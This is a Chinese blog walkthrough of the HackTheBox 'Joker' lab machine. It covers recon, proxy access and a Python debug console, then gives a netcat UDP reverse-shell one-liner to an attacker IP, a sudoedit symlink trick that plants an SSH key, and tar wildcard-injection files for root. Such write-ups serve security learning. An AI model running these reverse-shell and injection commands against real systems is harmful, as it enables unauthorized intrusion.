No.102-HackTheBox-Linux-Joker-Walkthrough渗透学习

最新推荐文章于 2024-08-23 16:53:34 发布
最新推荐文章于 2024-08-23 16:53:34 发布
阅读量475 收藏
点赞数
分类专栏: Hack The box 文章标签: python linux 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/106164684
版权

**

HackTheBox-Linux-Joker-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/20
靶机难度:中级(4.0/10)
靶机发布日期:2017年10月17日
靶机描述:
Joker can be a very tough machine for some as it does not give many hints related to the correct path, although the name does suggest a relation to wildcards. It focuses on many different topics and provides an excellent learning experience.

作者:大余
时间:2020-09-03

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.21…
在这里插入图片描述
nmap扫描发现了22和3128代理端口…这需要填写代理信息…进一步枚举
在这里插入图片描述
nmap扫描了UDP端口,开放了TFTP…

在这里插入图片描述
枚举TFTP发现了password哈希信息…
在这里插入图片描述
这里利用john爆破获得用户名密码…
在这里插入图片描述
通过插件填写代理用户名密码以及3128端口…
在这里插入图片描述
访问靶机IP,是个报错页面…

在这里插入图片描述
访问127.0.0.1发现是URL?利用sqlmap枚举了一会,没利用信息…
在这里插入图片描述
这里利用dirb和nikto发现了console页面…
在这里插入图片描述
访问后这是一个python开发人员使用的控制台…
Python反向Shell开始编写代码…其中测试了ping命令icmp是回包的…
但是直接输入shellcode没回应…
检查了防火墙发现:

首先将“入站”设置为默认值DROP,将出站和转发设置为默认值ACCEPT…
允许TCP 22入站,允许TCP 3128入站,允许所有UDP入站,允许所有ICMP入站,允许所有本地主机入站,所有新的出站TCP连接均被删除…没有允许出站tcp连接…
这里TCP的shell无法执行的情况,只能利用UDP的shell方法了…

在这里插入图片描述
命令:os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.14.6 6666 >/tmp/f").read()
这里方法很多,利用pentest monkey reverse shell中的shell提权即可…都可以利用…可看到获得了反向外壳…
这里经过测试很多都不是很稳定…自己慢慢测试吧…
在这里插入图片描述
sudo -l发现可利用sudoedit…搜索看

在这里插入图片描述
37710.txt:
在链接的漏洞利用程序中,如果两次使用通配符,则sudoedit不会检查完整路径,他们创建了一个指向的符号连接/etc/shadow,为我们执行此操作实际上对我们而言是行不通的,因为仅具有alekos而不是root的sudoedit权限,因此可以做的是创建一个指向alekos ssh授权密钥文件的符号链接,然后编辑该文件以添加到我们的公共ssh密钥中…开始

在这里插入图片描述
在目录下创建新的文件夹dayu,然后ln -s /home/alekos/.ssh/authorized_keys layout.html进行连接…
在这里插入图片描述
最后可以利用ssh-key生成ssh密匙,我这里使用的是kali本身root自带的密匙…
在这里插入图片描述
将密匙码复制入layout.html中即可…
这里还是挺坑的,很不稳定的shell外壳…

在这里插入图片描述
成功利用好,登录了ssh的alekos用户界面内…获得了user_flag信息…

在这里插入图片描述
枚举了一会发现了目的底层存在backup和development文件夹…进入发现了问题…
backup文件夹内每隔几分钟会自动生成一个tar压缩文件…
我随意解压了任意一个压缩包,发现里面的信息和development文件夹内容一样…
意思就是每隔五分钟tar压缩包会在development目录上运行一次…

在这里插入图片描述
命令:

touch -- --checkpoint=1
touch -- '--checkpoint-action=exec=python shell.py'
chmod +x shell.py

这里进入backup目录并使用它touch来创建两个文件,一个是–checkpoint=1。这将对添加到归档中的第一条记录触发检查点进行操作…
第二个是–checkpoint-action=exec=python shell.py,意思就是告诉它在到达检查点时tar压缩包来运行shell.py的shellcode…
该shell.py很简答的shell,等待了几分钟,获得了root的反向外壳…
并获得了root_flag信息…非常好!!

这台靶机是通关后补的,因为在python开发页面哪里提的shell外壳非常非常不稳定…当初刚打到这台靶机的时候,一直没过卡着,也是通关完HTB后回头补了这台…回头打的时候感觉好简单啊…
这里建议多测试下提权的shellcode,多测试几个有些是稳定的…

加油!!

由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mongodb-linux-x86_64-4.0.10.tgz
04-05
mongodb-linux-x86_64-4.0.10.tgz的下载 mongodb-linux-x86_64-4.0.10.tgz的下载 mongodb-linux-x86_64-4.0.10.tgz的下载
vulhub靶机joker渗透
qq_56666960的博客
02-07 2955
vulhub靶机joker渗透
渗透测试——joker靶场漏洞复现
人若有志,就不会在半坡停止。
10-21 1804
目标的子域是一个重要的测试点,你收集到的可用的子域名越多,意味着你的机会也就越多,所以说要尽可能的收集目标的子域名。一个网站可能会开放多个不同的端口,而我们可以通过同一网站的不同端口进行测试,扫描开放端口的方法有很多,这里我分为两种:第一种在线端口扫描,第二种利用工具扫描端口。目录扫描我分为两种:一种时在线目录扫描,一种是利用工具扫描目录。信息收集方式:扫描(端口扫描、漏洞扫描)、公开信息(搜索引擎、网站、论坛、媒体报道、微步社区、潮汐指纹、站长之家、子域名挖掘、备案号)、其他方式(钓鱼邮件、社工)
oscp——htb——Joker
王嘟嘟的博客
07-14 523
0x00 前言 这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。 0x01 信息收集 0x02 Web——Webshell 这里有一个3128开放,我找了历史漏洞但是都没有利用成功。 最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。 但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。 使用tftp进行连接 然后获取squid相关内容 /etc/squid/squid.conf /etc/squ
Hack The Box - Irked Writeup
qq_23026851的博客
04-28 829
nmap 扫描全端口,其中有价值的为22,80,8080,65534。 通过8080端口,可以找到djmardov/下有一个.backup文件,内容为 下载80端口网页上的图片,用steghide获取隐写的文字,密码即是上图里的那一串。隐写的文字即为用户djmardov的密码。 另一种方法是用metasploit中的unreal_irc_backdoor模块,攻击65534端口,可得到一个权...
vulnhub靶场之HA: Joker
qq_34613171的博客
02-15 951
难度:低级 该实验室将引入一些无政府状态。它将破坏既定的秩序,一切变成混乱。涂上你的脸,穿那套紫色的西装,因为是时候传达你内在的小丑了。这是一个boot2root实验。获得根标志是最终目标。 枚举是关键!!!! 查看页面源代码,发现大量注释。 没看过小丑的电影,不知道这些台词啥意思。 访问8080端口,发现需要http认证。我怀疑账号密码需要在这些注释里找线索, 在这里浪费的大量时间。 做不出...
jade:Jade.go-Go的哈巴狗模板引擎(golang)
02-03
软件包jade(github.com/Joker/jade)是实现Jade / Pug模板的简单快速的模板引擎。 Jade将模板预编译为Go代码或生成html / template。 现在,Jade-lang被重命名为。 Jade / Pug语法 例: //- :go:func Index(page...
Redis-x64-3.0.504.msi.zip
09-15
- 对于Windows用户来说,这是一个重要的里程碑,因为Redis原本主要针对Linux系统,3.0.504开始提供了官方支持的Windows版本。 3. **Windows上的Redis安装**: - 使用"Redis-x64-3.0.504.msi"安装文件,用户可以...
nginx1.25.4-centos6的rpm包
04-16
nginx的rpm包为centos最新版本
flycheck-joker:Clojure语法检查器(通过Joker)进行flycheck
02-02
(setq flycheck-joker-executable "/path/to/joker") ``` 总结一下,`flycheck-joker` 是一个强大且高效的 Clojure 语法检查解决方案,它结合了 `Flycheck` 的实时检查功能和 `Joker` 的高性能分析,为 Emacs 用户...
如何在Python中使用IP代理
最新发布
IPIPGO的博客
08-23 321
通过以上步骤,你应该已经学会了如何在Python中使用IP代理。无论是单个代理IP、带认证的代理IP,还是批量使用代理IP,这些方法都能帮助你在实际项目中灵活应用。希望这篇文章对你有所帮助,如果你有任何问题或建议,欢迎在评论区留言,我们会尽力为你解答。t=N7T8。
常见面试问题(Python)
jiao_mrswang的博客
08-23 91
5、GIL全局解释锁。
零基础学习人工智能—Python—Pytorch学习(六)
kiba518的博客
08-21 828
前言 本文主要讲神经网络的上半部分。 这篇文章开始有很多公式了,这些公式都很简单,但是如果是不经常在脑海里思考公式的人,那可能需要多花点时间做一下自我训练,个人感觉,也就几天时间,就能把自己感觉给调整出来。 习惯了公式看下面内容就会轻松很多,另外如果要深入学习人工智能,熟练的认知公式也是个必须的事情。 另外,我发现我前面文章写的有歧义的地方还是挺多,虽然,已经改了一部分,但,可能还有没发现的,大...
基于Python星载气溶胶数据处理与反演分析
lwjnlqiqi的博客
08-21 1145
Python星载气溶胶数据处理与反演分析
2024.8.20 Python,链表,二叉树
RaidenMessi的博客
08-20 404
代码逻辑:第一层,对l1.val进行判断,谁小听谁的,目标是输出这个链表,那就要修改这个链表,在第一层的时候,是先进函数,再赋值,所以在第一层的时候还没进行赋值就已经进第二层了,在第二层的时候还没赋值就又进第三层了,以此类推,然后每一次都抛掉一个最小的数。可能之后就理解了吧。我想了下,我决定不管了,就跟二分法当时一样,我直接按逻辑走,谁小谁就去用他的next继续和他刚才的人比,同时输出他自己本身,完事了。链表是线性表,是一维的,保存了现在这个数的值和下一个数的地址,分为表元素域,下一结点链接域,
基于YOLO V8的PCB缺陷检测识别系统(python源码+Pyqt5界面+数据集+训练代码)
2401_83580557的博客
08-22 373
基于YOLO V8的PCB缺陷检测识别系统【python源码+Pyqt5界面+数据集+训练代码】
Transformer经典模型实战:零基础训练一个面向中文的T5模型(Text to Text Transfer Transformer)
bayesian1的博客
08-20 1071
Transformer经典模型实战:零基础训练一个面向中文的T5模型(Text to Text Transfer Transformer),通过构建T5模型,采用中文重写任务的数据集进行训练,模型效果非常好,貌似还涌现出了一定的创造力。
python之matplotlib (5 散点图和柱状图)
这是C.L 的博客,欢迎大家学习浏览!!
08-20 457
附:colormap对照 '%.f'%y‘是标注数据的形式设置:保留两位小数,数据来源于y数组。也可以这样写:f'{y:.2f}',在它前面的参数是标注的位置。也可以是一个数组,表示每个点的颜色不同。ax.bar()中y参数是直方图的高度,其中facecolor是条形图的颜色,而edgecolor是除了条形图内的颜色。也可以是一个数组,表示每个点的大小不同。参数来指定一个colormap,用于映射颜色数组到颜色。
反射异常捕获 | InvocationTargetException 要用e.getCause()打印才能看到具体异常
你个无聊小demo的博客
08-22 312
反射异常捕获 | InvocationTargetException 要用e.getCause()打印才能看到具体异常
gradle-wrapper.properties文件指定本地gradle
09-17
### 回答1: `gradle-wrapper.properties`文件是Gradle的一个重要文件,它用于配置Gradle包装器的行为,例如指定Gradle版本、下载Gradle的URL等。如果想要在本地使用指定版本的Gradle,可以按照以下步骤操作: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值